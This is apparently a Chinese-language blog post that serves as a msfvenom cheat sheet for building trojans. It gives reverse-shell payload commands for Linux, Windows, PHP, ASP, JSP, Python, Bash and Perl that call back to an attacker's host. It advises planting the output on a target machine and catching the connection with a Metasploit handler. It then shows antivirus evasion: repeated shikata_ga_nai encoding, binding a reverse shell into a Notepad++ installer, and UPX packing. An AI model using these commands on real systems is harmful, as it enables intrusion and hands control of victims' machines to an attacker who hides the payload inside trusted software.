一、msfvemon基础

-p(--payload-options):添加载荷payload。

--lhost: 反弹地址

--lport:反弹端口

-a:选择架构平台,x86,x64,x86_64

--platform: 选择平台,windows,Linux

-e: 使用编码进行免杀

-i : 编码次数

-b : 避免使用的字符,例如'\x00\'

-f : 输出文件格式,如exe\c\elf\asp\php\aspx

-l: 查看所有的oayload encoder nops

-o: 文件输出

-s:生成payload的最大长度,就是文件大小

-c: 添加自己的shellcode

-x|-k :捆绑软件

二、常用生成木马过程

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<port> -f raw > shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Ip> LPORT=<port> -f raw > shell.jsp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<port> -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=<port> -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST=<ip> LPORT=<port> -f raw > shell.pl

以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的ip

然后在msf中使用模块/exploit/mlti/handler进行监听,使用对应payload即可。

三 、msfvenom高级用法

1.免杀

1.编码免杀

在Kali终端输入msfvemon -l encoders列出所有可用编码格式。需要注意的是并不是所有的编码方式都适用于Windows系统,建议使用x86/shikata_ga_nai格式,使用-e参数指定编码格式。

1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai  -i 12 -f exe 

2.捆绑免杀

由于裸奔木马容易被杀毒软件查杀,因此需要将木马捆绑到一个正常的软件上

1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe

3.对生成的木马进行upx加壳

upx -9 shell.exe -k -o shell1.exe

 

 

 

 

 

msfvemon

posted on 2021-08-09 14:17  牧羊大哥  阅读(195)  评论(0编辑  收藏  举报